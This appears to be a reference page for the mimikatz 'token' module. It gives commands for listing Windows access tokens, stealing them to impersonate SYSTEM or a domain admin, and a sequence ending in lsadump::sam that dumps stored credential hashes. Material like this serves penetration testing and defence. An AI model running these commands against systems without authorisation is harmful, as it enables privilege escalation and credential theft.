token
Manipulate Windows access tokens. Used to impersonate other users and elevate to SYSTEM.
Prerequisites
mimikatz # privilege::debug
whoami
Display current token/identity information.
mimikatz # token::whoami
list
Enumerate all accessible tokens on the system. Shows available tokens that can be impersonated.
mimikatz # token::list [/user:<username>] [/id:<pid>]
Options
/user:<username>β filter by username/id:<pid>β filter by process ID
elevate β Token Impersonation / SYSTEM
Impersonate a token, most commonly used to elevate to SYSTEM. Required before lsadump::sam and other operations that need SYSTEM access.
mimikatz # token::elevate [/domainadmin] [/admin] [/id:<pid>] [/user:<username>]
Options
- (no flags) β elevate to SYSTEM (uses
NT AUTHORITY\SYSTEMtoken from a SYSTEM process) /domainadminβ impersonate a domain admin token (if available on the system)/adminβ impersonate any local admin token/id:<pid>β steal token from specific process/user:<username>β steal token from specific user's process
Examples
# Elevate to SYSTEM (most common)
mimikatz # token::elevate
# Steal domain admin token
mimikatz # token::elevate /domainadmin
# Steal from specific PID
mimikatz # token::elevate /id:4
# Common flow for SAM dump
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
revert
Revert back to the original token (undo impersonation).
mimikatz # token::revert
run
Run a command under an impersonated token.
mimikatz # token::run /process:<exe> [/id:<pid>] [/user:<username>]
Notes
token::elevateis typically used beforelsadump::sam,lsadump::secrets,lsadump::cache- SYSTEM token impersonation works because Windows services run as SYSTEM and their tokens are accessible to local admins
token::revertis important for cleanup β staying as SYSTEM can cause unexpected behavior